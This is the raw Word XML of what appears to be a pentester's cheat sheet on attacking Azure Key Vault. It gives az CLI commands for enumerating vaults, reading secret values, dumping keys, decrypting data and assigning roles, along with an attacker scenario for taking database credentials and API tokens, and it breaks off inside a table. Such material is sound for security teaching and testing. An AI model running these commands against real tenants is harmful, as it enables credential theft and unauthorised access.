      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="55FC6018">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C3E993" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE46499" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>List all Key Vaults in the subscription:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F42443" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault list -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282000A6" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>List all secrets in a specific Key Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC59FC4" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret list --vault-name &lt;VAULT_NAME&gt; -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8F1CA3" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Get a specific secret’s value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A6B90" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret show --vault-name &lt;VAULT_NAME&gt; --name &lt;SECRET_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190D3EB1" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>List all keys stored in a Key Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2ADBCD" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault key list --vault-name &lt;VAULT_NAME&gt; -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033F169A" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Get key details (includes key type &amp; allowed operations):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2652BE3B" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault key show --vault-name &lt;VAULT_NAME&gt; --name &lt;KEY_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F589E53" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>List key versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BEAC2C" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault key list-versions --vault-name &lt;VAULT_NAME&gt; --name &lt;KEY_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDFDB8A" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="4DFF5EEC">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF628E0"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Access Control &amp; Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8B2139" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Key Vault access is managed via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16864753" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Role-Based Access Control (RBAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – scoped to the vault or higher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386AF6CC" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Access Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – set directly on the vault (older model, but still common).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8ABA0F" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>List access policies (if enabled):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3710DC5E" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault show --name &lt;VAULT_NAME&gt; --query "properties.accessPolicies"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2D300" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Check who has access to Key Vault via RBAC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C55A1A" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az role assignment list --scope $(az keyvault show --name &lt;VAULT_NAME&gt; --query id -o tsv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E6CA3" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="58E95448">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A9736"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Credential Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7BEF9" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>If the current user/service principal has get or list permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F60D75" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Retrieve secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F016C" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret show --vault-name &lt;VAULT_NAME&gt; --name &lt;SECRET_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E963D64" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Retrieve keys (to decrypt blobs, tokens, etc.):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BDDECD" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault key decrypt --name &lt;KEY_NAME&gt; --vault-name &lt;VAULT_NAME&gt; --algorithm RSA-OAEP --value &lt;BASE64_ENCRYPTED_DATA&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73191E29" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="0A53321D">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A6F3DF"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Real-World Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E677EC" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>An Azure Function stores connection strings in Key Vault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74935E44" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Attacker compromises the Function identity or a misconfigured role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494461F" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>With get access, they dump secrets (DB creds, API tokens).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5752F0FF" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>If encrypted files are found in Blob Storage, use Key Vault keys to decrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F44965" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="34B641DA">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB06A9A"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Additional Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F677A7" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>List Key Vault RBAC Roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4159161D" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az role definition list --query "[?contains(name, 'Key Vault')]" -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B22537" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Assign Key Vault Secret Reader Role (for exploitation in lab):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A57D0" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az role assignment create --assignee &lt;PRINCIPAL_ID&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117C68B" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --role "Key Vault Secrets User" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58287F43" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --scope $(az keyvault show --name &lt;VAULT_NAME&gt; --query id -o tsv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A71318" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="4F090E54">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38944CD2"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Useful for Pentesters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3621"/>
        <w:gridCol w:w="4002"/>
      </w:tblGrid>
      <w:tr w:rsidR="0046162E" w:rsidRPr="00436C36" w14:paraId="7C0AF0B6" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C53EA9C" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Exploit Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A5C1FBD" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Required Permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B3A70ED" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0046162E" w:rsidRPr="00436C36" w14:paraId="74EE25E0" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AC1744C" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Secret Dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A975CF3" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>get / list on secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD5D236" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Dump credentials, tokens, connection strings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0046162E" w:rsidRPr="00436C36" w14:paraId="797C5598" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F2FEE6B" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Key Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CDA7C61" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>unwrapKey, decrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E2524F" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Decrypt encrypted blobs/files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0046162E" w:rsidRPr="00436C36" w14:paraId="15098857" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
